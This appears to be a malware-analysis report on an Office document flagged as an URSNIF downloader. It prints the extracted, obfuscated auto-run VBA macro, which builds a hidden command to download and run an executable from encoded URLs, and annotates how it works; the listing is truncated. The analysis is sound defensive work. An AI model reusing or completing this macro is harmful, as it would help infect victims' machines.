MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
This Office document contains VBA macros, including a Document_Open macro that runs automatically when the file is opened. The critical heuristic that fired indicates use of the Shell() function, which is likely used to download and execute a second-stage payload; the extracted macro below assembles the Shell() command line from obfuscated string fragments returned by helper functions. The ClamAV detection further confirms the malicious nature of the file, identifying it as an URSNIF downloader (Doc.Downloader.URSNIF-6729855-3).
Heuristics 5
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body). (This is the standard OOXML DrawingML namespace identifier present in ordinary Office files, not a network indicator; the macro-built strings are not listed here.)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4930 bytes |

SHA-256: 84d2e9937c7e6b0b5661ed7c57dba7c2df642eab990e84cfc0ec13dff8d41be5
Preview script — First 1,000 lines of the extracted script
' Module header as exported by olevba. VB_Base = "1Normal.ThisDocument" identifies this as the
' document's ThisDocument class module, which is where Word looks for the Document_Open event
' handler defined below (the OLE_VBA_DOCOPEN finding).
Attribute VB_Name = "jSQvssMRHKUko"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word fires Document_Open when the file is opened. The sub exists only to
' hand one assembled command line to VBA.Shell; every other statement is filler.
Private Sub Document_open()
' "On Error Resume Next" written with line continuations. Every runtime error below is swallowed,
' so the filler calls never interrupt execution and no error dialog is shown to the user.
On _
Error _
Resume _
Next
' Filler: Hour is called as a statement and its result discarded (or its type-mismatch error is
' suppressed by the handler above). The same pattern repeats throughout the helper functions.
Hour "427287058" + "396958911"
' The only effective statement. The command string is the concatenation of CleanString(aIi)
' (presumably Word's Application.CleanString; aIi is not defined in this preview) and six
' helper results — izLvIFB and HFCHsVdVvQK are visible below, the other four are outside the
' preview. The window-style argument 16 - 16 evaluates to 0 (vbHide), so the spawned process
' runs without a visible window. This line is what the OLE_VBA_SHELL heuristic flagged.
VBA.Shell CleanString(aIi) + TaGoTmjSFkm + fMpZaLtYtNpTX + izLvIFB + HFCHsVdVvQK + XbCvihwtLDWzu + oOcKbuNAi, 16 - 16
' Filler.
Hour "vquiirCLiTiVD" + "zAiY" + "qNPvJaUc" + "cW"
Hour "99855251" + "281460772"
Hour "FaMR" + "1895"
Hour "bED" + "kGXazsbj"
End Sub
' Start of a second module in the same VBA project; it holds the string-building helpers
' (izLvIFB, HFCHsVdVvQK) referenced by the VBA.Shell line in Document_open.
Attribute VB_Name = "GUEvnqdiful"
' Returns one segment of the command line that Document_open passes to VBA.Shell.
' The real work is the eleven string assignments below; the interleaved Hour lines are filler.
' Each fragment is itself built by concatenating short literals so that no single literal in
' the module contains a recognisable token.
Function izLvIFB()
' Suppress all runtime errors (see Document_open).
On _
Error _
Resume _
Next
Hour "dnZj" + "HcmNqYNXn"
Hour "POVomdz" + "HQw"
Hour "At" + "8299" + "156367564" + "JSVtC"
Hour "OwD" + "448488717"
Hour "pMEdpqoMGBtNjb" + "EwG" + "237" + "aBUn"
' Fragment 1: "cmd /V:ON/C" followed by Chr(34) — 5+0+4+3+22 = 34, a double quote — and then
' caret-laden text. /V:ON enables delayed variable expansion in cmd.exe, and cmd treats ^ as an
' escape character that is removed during parsing, so the carets only exist to break up
' static-string matching.
XSqSYNhpLs = "cm" + "d " + "/V:ON/C" + Chr(5 + 0 + 4 + 3 + 22) + "^se" + "^t ^d^J" + "= " + "^ ^ " + "^" + " ^ " + " " + "^ " + "^ ^ " + "^ "
Hour "VYStabTYTXthYL" + "OzdBARWjJzC" + "za" + "qlm"
Hour "YXFC" + "695"
' Fragment 2.
PJGtli = "^ " + "}" + "}{hct^a" + "c^};^k" + "^ae" + "r" + "b^;c^" + "P^a$" + " ^me^t" + "^"
Hour "25921645" + "327233615"
Hour "v" + "8627" + "DVzEh" + "8685"
Hour "jiFoijzXK" + "thw"
' Fragment 3.
WKNnNzZlGh = "I-e" + "kovnI" + ";)c" + "^P^a$" + "^ ^,^" + "u^az" + "$(^" + "e^l" + "^iF^d" + "a^o" + "^" + "lnw^o^"
Hour "QQr" + "apuFswbsNtNbs"
Hour "sbwjO" + "i"
' Fragment 4.
plzasqtFcB = "D" + ".P^" + "j" + "N$" + "{yr^" + "t{" + ")j^Ip$" + " ni^ ^" + "uaz" + "^" + "$(hca"
Hour "507975329" + "ZCaK" + "OSIcjXz" + "FvhDKKHV"
Hour "8855" + "k"
' Fragment 5.
zzHCOvGiv = "^e" + "r^" + "of;^" + "'ex" + "e.^" + "'+^ptv" + "^$+^'^\"
Hour "kclwhJ" + "TuBipivS"
Hour "2538" + "4136" + "mBjVVfM" + "w"
Hour "AtzqkjFTw" + "sNC" + "8844" + "Hjuijrnq"
' Fragment 6.
zhQamADjcU = "^'+" + "c" + "^i^" + "lb" + "^u^p:" + "vn^e^$" + "=cPa" + "^$;^'" + "^" + "874^'"
Hour "180259090" + "piz" + "fcjjwGsLa" + "k"
Hour "YJKDODjAkzS" + "6360"
' Fragment 7.
qBlktI = " ^=^" + " ^ptv^" + "$^;)'^" + "@^" + "'(" + "^t^" + "i" + "l^p^S"
Hour "wFztP" + "kLL" + "Jn" + "JVvPuz"
Hour "70984245" + "oiYRZs"
Hour "uZEbaQv" + "iQPI" + "tFaMUiCN" + "DubX"
' Fragment 8.
AZdDSoXFt = ".'^1^" + "9S" + "^A^x^" + "IH/" + "on^.^"
Hour "qPPUDZUNK" + "336950012" + "4905" + "WKAC"
Hour "8431" + "SpSp" + "93188920" + "jq"
Hour "Gws" + "5898" + "izqZ" + "tfMNzR"
' Fragment 9.
sIdiqBJSDf = "s" + "y^a^w" + "//^" + ":" + "pt"
Hour "3726" + "hLPUiwwMi"
' Fragments 10 and 11. NOTE(review): tokens such as "moc." and "p^tt^h" read as reversed text
' ("http", ".com"), which suggests the assembled command reverses the string at runtime before
' it is interpreted; the decoded hosts are not reproduced in this report and should be
' recovered from a sandbox run or a controlled deobfuscation rather than read off this listing.
YtVzCXDzRh = "t^h^" + "@" + "N^" + "o" + "^O^4" + "/^moc" + "^.rasna" + "^" + "k^hs" + "^evak/"
Hour "IANfJJDU" + "AlRtBVOjP" + "bsjonjOEzomZjV" + "n"
Hour "SncYJkwwwt" + "qn"
hOIWaQzUz = "/^:^p^" + "t^t" + "^h^@y" + "V^JV^H" + "^h" + "/^" + "m^o" + "c.flu" + "^gf" + "^al" + "a^k//:^" + "p^tt^h"
' Return value: the eleven fragments joined in assignment order.
izLvIFB = XSqSYNhpLs + PJGtli + WKNnNzZlGh + plzasqtFcB + zzHCOvGiv + zhQamADjcU + qBlktI + AZdDSoXFt + sIdiqBJSDf + YtVzCXDzRh + hOIWaQzUz
Hour "411833087" + "zaOSwYXT" + "u" + "ipari"
End Function
Function HFCHsVdVvQK()
On _
Error _
Resume _
Next
Hour "omDOAubEU" + "m"
Hour "ZzvF" + "jr" + "FwoNJ" + "JQWMakQPNJJZK"
rhrsbb = "^@kn" + "^37^7^" + "X/moc" + "^.n^g" + "^i^" + "s^eda^t" + "^ic" + "ser" + "c//^" + ":^p" + "^t^t^h" + "@qk" + "/^"
Hour "BCnd" + "zptd"
Hour "VVb" + "uKllviVu"
Hour "356220585" + "483940968" + "XQjQj" + "9860"
Hour "JlzIz" + "179795829"
UuKjEO = "moc.ecn" + "an^e" + "tni^" + "a^" + "m" + "es^" + "u^" + "o^h^la^" + "t^" + "ot^.^l" + "^ar"
Hour "224131812" + "SWuc"
Hour "511204006" + "504720858"
Hour "fQMUBNi" + "Ikz"
Hour "pTQbZ" + "kp"
Hour "JZCP" + "scXXQzvcOwAq"
Hour "91641517" + "Sn" + "bM" + "102371048"
AOszQKcn = "^o^p" + "^m^e^t" + "//" + ":^pt" + "^t^h'=" + "^" + "j^I^p$;"
Hour "hEUVHFUFFr" + "281941715"
Hour "znOiXtaGJ" + "2598"
Hour "191904866" + "2857" + "4468" + "250166105"
XnSGPjiIc = "^tn^e" + "^i" + "lC^b^" + "e^W^." + "teN^" + " tc" + "^ejb^o"
Hour "349372737" + "vVLX"
Hour "QTiVW" + "I"
Hour "SVNB" + "7174" + "RqHtouVOk" + "B"
Xu
... (truncated)